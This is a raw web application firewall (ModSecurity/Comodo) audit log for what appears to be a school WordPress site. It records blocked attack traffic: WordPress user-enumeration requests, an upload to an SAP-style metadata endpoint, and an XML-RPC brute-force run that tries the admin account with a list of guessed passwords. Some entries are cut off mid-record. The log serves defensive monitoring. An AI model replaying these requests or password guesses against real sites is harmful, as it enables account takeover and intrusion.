Connection: close Content-Type: text/html; charset=iso-8859-1 --7eb1935a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749175075941818 3202 (- - -) Stopwatch2: 1749175075941818 3202; combined=1377, p1=454, p2=893, p3=0, p4=0, p5=30, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7eb1935a-Z-- --4e44632d-A-- [06/Jun/2025:09:04:26 +0700] aEJMqtKrQJH3faNNWWAYowAAAM0 103.236.140.4 51770 103.236.140.4 8181 --4e44632d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 206.189.80.189 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 206.189.80.189 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4e44632d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4e44632d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749175466929945 2613 (- - -) Stopwatch2: 1749175466929945 2613; combined=1264, p1=459, p2=776, p3=0, p4=0, p5=29, sr=99, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4e44632d-Z-- --c760db26-A-- [06/Jun/2025:09:44:56 +0700] aEJWKIpHVOr-3zoVB37GaAAAAQw 103.236.140.4 41532 103.236.140.4 8181 --c760db26-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 162.240.233.45 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 162.240.233.45 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c760db26-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c760db26-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749177896474409 3512 (- - -) Stopwatch2: 1749177896474409 3512; combined=1517, p1=466, p2=1019, p3=0, p4=0, p5=32, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c760db26-Z-- --97b32f2d-A-- [06/Jun/2025:09:52:11 +0700] aEJX24pHVOr-3zoVB37G5gAAAQw 103.236.140.4 44812 103.236.140.4 8181 --97b32f2d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 50.6.171.37 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 50.6.171.37 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --97b32f2d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --97b32f2d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749178331172160 3332 (- - -) Stopwatch2: 1749178331172160 3332; combined=1437, p1=455, p2=952, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --97b32f2d-Z-- --6117254b-A-- [06/Jun/2025:09:55:23 +0700] aEJYm_HwHPygw9BuFzQ6TAAAAIw 103.236.140.4 46258 103.236.140.4 8181 --6117254b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 8.220.221.123 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 8.220.221.123 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6117254b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6117254b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749178523851840 3123 (- - -) Stopwatch2: 1749178523851840 3123; combined=1362, p1=500, p2=834, p3=0, p4=0, p5=28, sr=124, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6117254b-Z-- --8bcf3210-A-- [06/Jun/2025:10:06:12 +0700] aEJbJOJsrKcXA4Tjex0NOQAAAEw 103.236.140.4 51060 103.236.140.4 8181 --8bcf3210-B-- POST /developmentserver/metadatauploader?CONTENTTYPE=MODEL&CLIENT=1 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 77.90.153.48 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 77.90.153.48 X-Forwarded-Proto: http Connection: close Content-Length: 520 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Safari/605.1.15 Content-Type: multipart/form-data --8bcf3210-C-- PK .propertiesœÑËjAà“¹N ^2’…;Y¦Û€™ž1xCéhˆ îb9]ÝÕ±º«ò×ß±ÌÂÇÂ\‰/ [×Ùú‚ÒcãàN<«Spø øßGß.‰Ö\èpŸŒ•Ä…tãÕ/§vxë] ‚Tf¢ÖìkI³Žšu4_o{Â`ÎÜN±x¡åàã…õ«Î>tÑÙŲ6"ÝS64Á+’Nz{ûšt_ú:Œó–Ì‘œòF%¸&é—þö÷„í/~ûôyíù×ÒWfúE Ž°2Ã*ÉáÓƒäíz<¼ò㌺Xœ P©{&•ô¬!N°$jV† ~ÍXýý}-ª --e4d4326a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e4d4326a-E-- --e4d4326a-H-- Message: Access denied with code 403 (phase 2). String match " --672e4e3d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --672e4e3d-E-- --672e4e3d-H-- Message: Access denied with code 403 (phase 2). String match " --8e439d79-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8e439d79-E-- --8e439d79-H-- Message: Access denied with code 403 (phase 2). String match " --9b0f5c04-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9b0f5c04-H-- Message: Access denied with code 403 (phase 2). String match " --d0d30f13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d0d30f13-E-- --d0d30f13-H-- Message: Access denied with code 403 (phase 2). String match " --75886a19-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --75886a19-E-- --75886a19-H-- Message: Access denied with code 403 (phase 2). String match " --9a323850-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9a323850-H-- Message: Access denied with code 403 (phase 2). String match " --9016b012-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9016b012-E-- --9016b012-H-- Message: Access denied with code 403 (phase 2). String match " wp.getUsersBlogs admin 12345678 --27d51534-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --27d51534-E-- --27d51534-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749283281608484 5306 (- - -) Stopwatch2: 1749283281608484 5306; combined=3784, p1=429, p2=3197, p3=0, p4=0, p5=94, sr=86, sw=64, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --27d51534-Z-- --115b9e72-A-- [07/Jun/2025:15:02:22 +0700] aEPyDmCOO9DrcKL2J_7qwAAAANM 103.236.140.4 35388 103.236.140.4 8181 --115b9e72-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --115b9e72-C-- wp.getUsersBlogs admin admin888 --115b9e72-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --115b9e72-E-- --115b9e72-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (67+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749283342702583 4384 (- - -) Stopwatch2: 1749283342702583 4384; combined=3096, p1=401, p2=2550, p3=0, p4=0, p5=85, sr=80, sw=60, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --115b9e72-Z-- --461b6832-A-- [07/Jun/2025:15:03:22 +0700] aEPySpANhDjQAvBdMyHMLQAAAIU 103.236.140.4 37098 103.236.140.4 8181 --461b6832-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --461b6832-C-- wp.getUsersBlogs admin admin1988 --461b6832-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --461b6832-E-- --461b6832-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (68+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749283402196608 5676 (- - -) Stopwatch2: 1749283402196608 5676; combined=4016, p1=460, p2=3360, p3=0, p4=0, p5=115, sr=87, sw=81, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --461b6832-Z-- --1fec4a32-A-- [07/Jun/2025:15:04:24 +0700] aEPyh5ANhDjQAvBdMyHMygAAAJg 103.236.140.4 39138 103.236.140.4 8181 --1fec4a32-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --1fec4a32-C-- wp.getUsersBlogs admin du7p72w5 --1fec4a32-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1fec4a32-E-- --1fec4a32-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (77+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749283463998364 5294 (- - -) Stopwatch2: 1749283463998364 5294; combined=3713, p1=448, p2=3086, p3=0, p4=0, p5=104, sr=79, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1fec4a32-Z-- --c3443b6c-A-- [07/Jun/2025:15:05:23 +0700] aEPywxK9gc79coX6mHR8jAAAAEc 103.236.140.4 41144 103.236.140.4 8181 --c3443b6c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c3443b6c-C-- wp.getUsersBlogs admin poohbear --c3443b6c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c3443b6c-E-- --c3443b6c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (82+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749283523615343 5337 (- - -) Stopwatch2: 1749283523615343 5337; combined=3814, p1=461, p2=3174, p3=0, p4=0, p5=107, sr=86, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c3443b6c-Z-- --81bb9d5f-A-- [07/Jun/2025:15:06:23 +0700] aEPy_2COO9DrcKL2J_7sBwAAANc 103.236.140.4 43226 103.236.140.4 8181 --81bb9d5f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --81bb9d5f-C-- wp.getUsersBlogs admin marketing2020 --81bb9d5f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --81bb9d5f-E-- --81bb9d5f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (85+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749283583214630 5282 (- - -) Stopwatch2: 1749283583214630 5282; combined=3814, p1=458, p2=3166, p3=0, p4=0, p5=110, sr=87, sw=80, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81bb9d5f-Z-- --304fd02e-A-- [07/Jun/2025:15:07:23 +0700] aEPzOxK9gc79coX6mHR9vAAAAEo 103.236.140.4 45468 103.236.140.4 8181 --304fd02e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 231 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --304fd02e-C-- wp.getUsersBlogs admin smkn22-jkt-sch-id123 --304fd02e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --304fd02e-E-- --304fd02e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (97+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749283643196650 4958 (- - -) Stopwatch2: 1749283643196650 4958; combined=3975, p1=444, p2=3227, p3=0, p4=0, p5=172, sr=86, sw=132, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --304fd02e-Z-- --b7d43911-A-- [07/Jun/2025:15:08:23 +0700] aEPzdxK9gc79coX6mHR-XAAAAEw 103.236.140.4 47534 103.236.140.4 8181 --b7d43911-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --b7d43911-C-- wp.getUsersBlogs admin superadmin --b7d43911-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b7d43911-E-- --b7d43911-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (52+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749283703153162 5442 (- - -) Stopwatch2: 1749283703153162 5442; combined=3941, p1=482, p2=3203, p3=0, p4=0, p5=142, sr=90, sw=114, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b7d43911-Z-- --61bb105b-A-- [07/Jun/2025:15:09:27 +0700] aEPzt2COO9DrcKL2J_7tyQAAANE 103.236.140.4 49572 103.236.140.4 8181 --61bb105b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --61bb105b-C-- wp.getUsersBlogs admin !null! --61bb105b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --61bb105b-E-- --61bb105b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (55+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749283767619916 4905 (- - -) Stopwatch2: 1749283767619916 4905; combined=3816, p1=461, p2=3169, p3=0, p4=0, p5=108, sr=87, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --61bb105b-Z-- --2c18053e-A-- [07/Jun/2025:15:10:27 +0700] aEPz8_ClubEPOra_8Un-FAAAAAo 103.236.140.4 51436 103.236.140.4 8181 --2c18053e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --2c18053e-C-- wp.getUsersBlogs admin work123 --2c18053e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2c18053e-E-- --2c18053e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (103+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749283827297830 5851 (- - -) Stopwatch2: 1749283827297830 5851; combined=4218, p1=480, p2=3403, p3=0, p4=0, p5=215, sr=85, sw=120, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2c18053e-Z-- --29febd53-A-- [07/Jun/2025:15:11:30 +0700] aEP0MhK9gc79coX6mHR_1QAAAEI 103.236.140.4 53294 103.236.140.4 8181 --29febd53-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: 